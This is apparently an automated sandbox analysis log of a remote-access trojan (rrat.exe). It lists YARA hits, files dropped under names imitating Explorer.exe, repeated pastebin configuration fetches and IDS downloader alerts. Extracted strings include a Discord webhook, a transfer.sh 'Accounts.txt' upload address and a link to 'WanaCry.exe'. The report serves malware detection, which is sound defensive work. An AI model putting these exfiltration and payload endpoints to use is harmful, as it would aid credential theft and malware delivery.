Source: Yara match | File source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.5:49706 -> 194.67.204.7:88
Source: global traffic | HTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1, Host: pastebin.com
Source: global traffic | HTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1, Host: pastebin.com, Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: Joe Sandbox ViewIP Address: 104.20.4.235
                        Source: Joe Sandbox ViewIP Address: 172.67.19.24
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS
                        Source: Joe Sandbox ViewASN Name: IHOR-ASRU
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49836 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49911 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49959 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50010 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50023 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50021 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50054 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50053 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50030 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50033 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50026 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50036 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50028 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50047 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50039 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50056 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50057 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49869 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49819 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49795 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49994 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49844 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49894 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49968 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49942 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49919 -> 172.67.19.24:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: pastebin.com
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: http://ipv4bot.whatismyipaddress.com/
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000011.00000002.2159201232.0000000003461000.00000004.00000800.00020000.00000000.sdmp, explore.exe, 00000018.00000002.2221220011.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: http://pastebin.com/raw/KKpnJShN
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/KKpnJShNd
                        Source: explore.exe, 00000018.00000002.2221220011.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/hbwHfEg3
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/hbwHfEg3d
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                        Source: rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://cdn.discordapp.com/attachments/903603651585663016/913496700734279730/WanaCry.exe
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://discord.com/api/webhooks/780783005307895818/1tcNqwidYko-32qqkw7-SN35HpBY-1NoZHwFmRnTSgREpOcu
Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | String found in binary or memory: https://dl.teamviewer.com/download/TeamViewer_Setup_x64.exe
Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/KKpnJShN
Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | String found in binary or memory: https://pastebin.com/raw/hFaPBSUm
Source: Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/hbwHfEg3
Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | String found in binary or memory: https://transfer.sh/Accounts.txt?
Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | String found in binary or memory: https://www.techniknews.net/wp-content/uploads/2018/07/discord-logo.jpg
Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | String found in binary or memory: https://youtu.be/9Ew461CAlmQ?t=10Chttps://youtu.be/xAZMu-qKLxE?t=35
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown | Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown | Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown | Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown | Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown | Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown | Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
